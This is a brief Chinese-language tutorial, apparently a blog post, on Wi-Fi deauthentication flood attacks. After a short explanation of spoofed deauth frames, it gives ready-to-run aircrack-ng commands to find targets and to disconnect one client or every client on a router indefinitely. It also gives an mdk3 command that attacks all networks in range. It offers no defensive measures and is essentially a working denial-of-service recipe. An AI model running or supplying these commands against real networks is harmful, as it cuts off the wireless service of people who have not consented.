简介:
Deauth Flood
攻击即为取消验证洪水攻击,它旨在通过欺骗从 AP 到客户端单播地址的取消身份验证帧来将客户端转为未关联 / 未认证的状态。对于目前的工具来说,这种形式的攻击在打断客户无线服务方面非常有效和快捷。一般来说,在攻击者发送另一个取消身份验证帧之前,客户端会重新关联和认证以再次获取服务。攻击者反复欺骗取消身份验证帧就能使所有客户端持续拒绝服务。
攻击步骤
1.探测周围的无线路由器以及连接到无线路由器上的设备
airmon-ng start wlan0 #开启无线网卡的监听模式
airodump-ng wlan0mon
2.使用aireplay进行攻击
指定特定的无线路由器上的特定设备进行Deauth Flood
攻击 10 是发送10次数据包如果是0的话就是一直发送数据包 -a 是路由器的mac
-c 是连接在无线路由器上的设备的mac
wlan0mon是无线网卡
aireplay-ng -0 10 -a 80:B0:7B:18:70:E0 -c FC:BE:7B:BE:35:E3 wlan0mon
我测试的设备分别是我家的路由器和我的手机,从这里我们可以看到我的手机已经被踢下线了
2.攻击指定路由器上的全部设备
aireplay-ng -0 0 -a 80:B0:7B:18:70:E0 wlan0mon
3.使用mdk3进行全网攻击(效果一样)
mdk3 wlan0mon d